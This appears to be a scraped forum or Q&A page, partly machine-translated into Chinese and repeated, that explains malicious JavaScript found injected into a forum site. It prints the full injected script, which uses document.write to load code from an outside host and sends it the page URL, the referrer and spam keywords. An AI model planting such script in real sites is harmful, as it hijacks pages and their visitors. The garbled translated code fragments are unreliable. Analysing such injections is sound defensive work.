论坛发布恶意javascript ff=0; 对于(文档中的nn),如果(nn=='etours'| | nn=='logo anim')ff=1; if(ff==0 | | |(/LIVE | MSN | YAHOO | GENERIC | NORVASC/.test(document.referer.toUpperCase())和&false)){ document.write('');document.write('
它在页面上写一个脚本标记,指向他们的javascript。他们的javascript将在你的网站上执行,让他们对你的网站做任何想做的事论坛发布恶意javascript ff=0; 对于(文档中的nn),如果(nn=='etours'| | nn=='logo anim')ff=1; if(ff==0 | | |(/LIVE | MSN | YAHOO | GENERIC | NORVASC/.test(document.referer.toUpperCase())和&false)){ document.write('');document.write(',javascript,Javascript,它在页面上写一个脚本标记,指向他们的javascript。他们的javascript将在你的网站上执行,让他们对你的网站做任何想做的事 前几行只是对可能在脚本中创建的变量的一些检查。可能与检查脚本标记是否已写入有关。它检查依赖项(由其他代码设置的javascript变量),然后它拨回家,让家庭服务器知道它成功感染了哪个页面 <SCRIPT> ff = 0; for (nn in document) if (nn == 'etours' || nn == 'logo-anim'
前几行只是对可能在脚本中创建的变量的一些检查。可能与检查脚本标记是否已写入有关。它检查依赖项(由其他代码设置的javascript变量),然后它拨回家,让家庭服务器知道它成功感染了哪个页面
<SCRIPT>
ff = 0;
for (nn in document) if (nn == 'etours' || nn == 'logo-anim') ff = 1;
if (ff == 0 || (/LIVE|MSN|YAHOO|GENERIC|NORVASC/.test (document.referrer.toUpperCase ()) && false ) ) {
document.write('<SCRIPT SRC ="http://p090303.info/w.php?l='+ escape(location.href) + '&k=' + escape('generic norvasc') + '&r=' + escape(document.referrer) + '"><' + '/SCRIPT>' ); document.write ('<' + '!--' );
}
</SCRIPT>